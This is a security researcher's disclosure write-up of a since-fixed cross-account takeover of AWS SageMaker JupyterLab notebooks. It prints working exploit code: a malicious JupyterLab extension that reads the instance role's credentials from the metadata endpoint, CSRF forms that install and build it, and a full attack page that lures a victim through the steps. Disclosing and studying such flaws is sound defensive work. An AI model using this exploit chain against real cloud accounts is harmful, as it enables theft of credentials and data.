AWS SageMaker Jupyter Notebook Instance Takeover

During our research about security in data science tools we decided to look at Amazon SageMaker which is a fully managed machine learning service in AWS. Here is the long and short of our recent discovery.

TL; DR

We found that an attacker can run any code on a victim’s SageMaker JupyterLab Notebook Instance across accounts. This means that an attacker can access the Notebook Instance metadata endpoint and steal the access token for the attached role.

Using the access token, the attacker can read data from S3 buckets, create VPC endpoints and more actions that are allowed by the SageMaker execution role and the “AmazonSageMakerFullAccess” policy.

We reported the vulnerability we discovered to the AWS security team, and they have since remediated it.

Intro

Amazon SageMaker is a fully managed machine learning service. With SageMaker, data scientists and developers can quickly and easily build and train machine learning models, and then directly deploy them into a production-ready hosted environment. It provides an integrated Jupyter notebook instance for easy access to your data sources for exploration and analysis, so you don't have to manage servers.

When we create a Notebook Instance in AWS SageMaker a new JupyterLab environment is created with a unique subdomain under the .notebook.us-east-1.sagemaker.aws parent domain (where us-east-1 can be replaced with a different region). Usually, the unique subdomain will be the name we give the Notebook Instance at the time of creation, but if the subdomain has already been taken, AWS adds some random values to the end of the subdomain.

I decided to play around with this environment and explore potential gaps, so I created a Notebook Instance named “gafnb” where gafnb.notebook.us-east-1.sagemaker.aws is its designated JupyterLab domain.

The following is a rundown of my path to the discovery of the AWS SageMaker Notebook Instance Takeover. This thread follows my thought process as I reveal the path to my findings.

Start with Self-XSS

Viewing the source of the main page exposes some interesting paths located on the VM running the JupyterLab application.

view-source:https://gafnb.notebook.us-east-1.sagemaker.aws/lab

 

img1b

One interesting path was the staticDir that pointed to
/home/ec2-user/anaconda3/envs/JupyterSystemEnv/share/jupyter/lab/static

I used the terminal in the JupyterLab to list the files in the static directory and found index.html

img2b

We can change its content and control what is running when browsing to: https://gafnb.notebook.us-east-1.sagemaker.aws/lab

img3b

img4b

This is clearly an XSS – but it is self XSS 🙁

Maybe this isn’t so useful… Or is it?

Cookies to the Rescue

As I mentioned at the beginning, all JupyterLabs Notebooks in SageMaker are created under the same parent domain. And to be more specific – all are under the subdomain of .sagemaker.aws

In such an environment where each user gets its own subdomain under the same parent domain, it is interesting to have a look at the cookies:

img5b

_xsrf cookie is set for the full domain. I consider that maybe I can use cookie tossing …

Cookie keys consists of the tuple (name, domain, path). Therefore, we can have 2 cookies with the same name if they have a different domain or path.

img6b

I decide to use the self XSS to create a new cookie named_xsrf and the domain attribute will be .sagemaker.aws so it will be sent to all its subdomains.

<script type="text/javascript">
document.cookie='_xsrf=1;Domain= .sagemaker.aws';
</script>

/home/ec2-user/anaconda3/envs/JupyterSystemEnv/share/jupyter/lab/static/index.html

This new _xsrf=1 cookie will then be sent to all subdomains of .sagemaker.aws including our victim’s on a different AWS account with the SageMaker JupyterLab domain of
victim-poc-nb.notebook.us-east-1.sagemaker.aws.

Self XSS to CSRF

Since I now know the _xsrf value I might gain a CSRF. JupyterLab server protects against CSRF by comparing the value of the _xsrf cookie with the value of the X-Xsrftoken header.

I tested the CSRF mechanism with a POST request that opens a new terminal.

Starting with the valid request (below)

img7b

And response (below):

img8b

Now, I try to remove the X-Xsrftoken header and see what the server’s response is. The first image is the request, and the second is the server’s response.

img9b

img10b

It looks like the server expects a _xsrf argument. I then try to add it in as a request parameter. The images are the request followed by the response.

img11b

img12b

Nice! We see that we can use a _xsrf request parameter instead of the X-Xsrftoken header.

Does the JupyterLab server checks the Origin header value? No. Let’s see what it looks like below (request, followed by the response).

img13b

img14b

Well, we now have all we need to exploit the CSRF!

We can use the CSRF to open a new terminal in the victim’s JupyterLab and use a cross origin WebSocket to run commands in the victim’s Notebook Instance. But there is also another way using JupyterLab’s extension.

Creating the JupyterLab Extension

JupyterLab extensions can customize or enhance any part of JupyterLab. They can provide new themes, file viewers and editors, or renderers for rich outputs in notebooks. We can create our own JupyterLab extension that will do anything we want on the victim’s JupyterLab Instance.

Let’s see what this might look like. I decide to create an extension with the following code and uploaded its package to npm.

import {
JupyterFrontEnd,
JupyterFrontEndPlugin
} from '@jupyterlab/application';

/**
* Initialization data for the mal_jupyter_ext extension.
*/
const plugin: JupyterFrontEndPlugin<void> = {
id: 'mal_jupyter_ext:plugin',
autoStart: true,
activate: (app: JupyterFrontEnd) => {
document.cookie = "_xsrf=1";
var xhr = new XMLHttpRequest;
var terminalUrl = location.origin + "/api/terminals?_xsrf=1";
xhr.open("POST", terminalUrl, true);
xhr.withCredentials = true;
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE && xhr.status == 200) {
var terminal_id = xhr.responseText.split('"')[3];
var wsUrl = "wss://" + location.host + "/terminals/websocket/" + terminal_id;
var ws = new WebSocket(wsUrl);
ws.onopen = function(evt) {
ws.send('["stdin","curl 169.254.169.254/latest/meta-data/iam/security-credentials/BaseNotebookInstanceEc2InstanceRole > SageMaker/token.json\\r"]');
};
}
};
xhr.send();
}
};

export default plugin;

This extension opens a new terminal in the victim’s JupyterLab and uses WebSocket to access the IMDS endpoint and extract the temporary credentials of the attached role. If only there was some way to make the victim install my malicious extension 😉

Installing a Malicious Extension Using CSRF

To view the extensions support we need to click on Settings -> Enable Extension Manager (experimental)

Note: Even if the extension support is not enabled the attack flow described in this post can still occur.

img15b

Enabling it will add the extension icon on the left menu

img16b

When installing an extension an HTTP POST request is sent:

img17b

I can use the CSRF to send this POST request to install my malicious extension on the victim’s JupyterLab Instance.

I started with a simple CSRF payload that installs my malicious extension called mal_jupyter_ex

<html>
<form action="https://gafnb.notebook.us-east-1.sagemaker.aws/lab/api/extensions?_xsrf=1" method="POST" enctype="text/plain" target="_blank">
<input type="hidden" name="{\"cmd\":\"install\",\"extension_name\":\"mal_jupyter_ex\"}" value="" />
<input type="submit" value="Submit request" />
</form>
</html>

But the output request for the payload above gave an invalid JSON output. Request shown first, followed by the response.

img18b

img19b

We can fix it by inserting the equal sign as part of a string.

<html>
<form action="https://gafnb.notebook.us-east-1.sagemaker.aws/lab/api/extensions?_xsrf=1" method="POST" enctype="text/plain" target="_blank">
<input type="hidden" name="{\"cmd\":\"install\",\"extension_name\":\" mal_jupyter_ex\",\"" value="\":1}" />
<input type="submit" value="Submit request" />
</form>
</html>

img20b

img21b

After installing a new extension, a build is required. We can use the CSRF to run the build request as well.

Tricky SameSite

I guess that by now some of you (including myself at the time) are wondering – but what about the SameSite being set by default to Lax?

Well, in some browsers the default is still None. Like Safari. But after some digging, I found a way to exploit it on Chrome as well. Apparently, Chrome gives us “2 minutes of grace” where during that time the cookie will be sent even in a POST request.

Note: Chrome will make an exception for cookies set without a SameSite attribute less than 2 minutes ago. Such cookies will also be sent with non-idempotent (e.g. POST) top-level cross-site requests despite normal SameSite=Lax cookies requiring top-level cross-site requests to have a safe (e.g. GET) HTTP method. Support for this intervention ("Lax + POST") will be removed in the future.

I decided to search for the request that sets the JupyterLab cookies.

When the user clicks on the “Open JupyterLab” in the AWS console a GET request is sent to:

https://console.aws.amazon.com/sagemaker/home?region=us-east-1#/notebook-instances/openNotebook/gafnb?view=lab

img22b

This HTTP request triggers a flow that generates an authentication token for the matching JupyterLab called authToken. The token is forwarded to the JupyterLab domain and if it is valid, the JupyterLab application sets all session cookies.

img23b

Luckily this is a GET request and AWS console’s cookies are defined with SameSite Lax or None so we can cause this flow using window.open or a link from a different origin.

Once this request is sent by the victim’s browser, the cookies are newly set, and I have 2 minutes to complete my attack.

Putting it all Together

The attacker:

  1. Creates the “attacking” notebook in the attacker’s AWS SageMaker account.
    Let’s call it attacker-poc-nb
  2. Assuming the victim’s notebook name is victim-poc-nb, the attacker opens a terminal in the attacking notebook and replaces the content of
    /home/ec2-user/anaconda3/envs/JupyterSystemEnv/share/jupyter/lab/static/index.html
    with the content below:
    <html>
    <a href="#" onclick="resetCookies()">Start Attack!</a>

    <form name="step1" action="https://victim-poc-nb.notebook.us-east-1.sagemaker.aws/lab/api/extensions?_xsrf=1" method="POST" enctype="text/plain" target="frame1">
    <input type="hidden" name="&#123;&quot;cmd&quot;&#58;&quot;install&quot;&#44;&quot;extension&#95;name&quot;&#58;&quot;mal_jupyter_ex&quot;&#44;&quot;" value="&quot;&#58;1&#125;" />
    </form>
    <form name="step2" action="https://victim-poc-nb.notebook.us-east-1.sagemaker.aws/lab/api/build?_xsrf=1" method="POST" target="frame2">
    </form>

    <iframe name="frame1" style="position: absolute;width:0;height:0;border:0;"></iframe>
    <iframe name="frame2" style="position: absolute;width:0;height:0;border:0;"></iframe>

    <script>

    function resetCookies(){
    window.open('https://console.aws.amazon.com/sagemaker/home?region=us-east-1#/notebook-instances/openNotebook/victim-poc-nb?view=lab');
    setTimeout(function(){ installExtension(); }, 5000);
    }

    function installExtension(){
    document.cookie='_xsrf=1;Domain= .sagemaker.aws';
    document.forms["step1"].submit();
    setTimeout(function(){ build(); }, 5000);
    }

    function build(){
    document.forms["step2"].submit();
    }

    </script>
    <html>

    img24b

  3. Turns on Burp’s interceptor and opens the attacker-poc-nb notebook from the AWS console.img25b
  4. Copies the URL with the authentication token and drops the request.
  5. Sends the link from the previous step to the victim. The link directs to the attacker notebook attacker-poc-nb with the authentication token.

The victim:

  1. Is already logged-in to their AWS account

  2. Clicks the malicious link that opens the attacker’s attacker-poc-nb

  3. Clicks the link/button that starts the attack flow.

    img26b
  4. In the background, once the victim clicks the malicious link / button, requests are being sent to install the malicious extension and rebuild the JupyterLab of the victim. If there is a “build failed” error – that is OK.

  5. Reopen the victim’s notebook victim-poc-nb (the build can take a minute). There should be a token.json file with the temporary credentials of the attached role.

    img27b

The Mitigation

Following our discovery, we reported the vulnerability to the AWS security team, and they have since remediated it. They added a check on the Origin header to ensure that the request is from the same origin to prevent the CSRF vulnerability.

-----------------------------------

About Lightspin

Lightspin’s context-based cloud security empowers cloud and security teams to eliminate risks and maximize productivity by proactively and automatically detecting all security risks, smartly prioritizing the most critical issues, and easily fixing them. For more information, visit https://www.lightspin.io/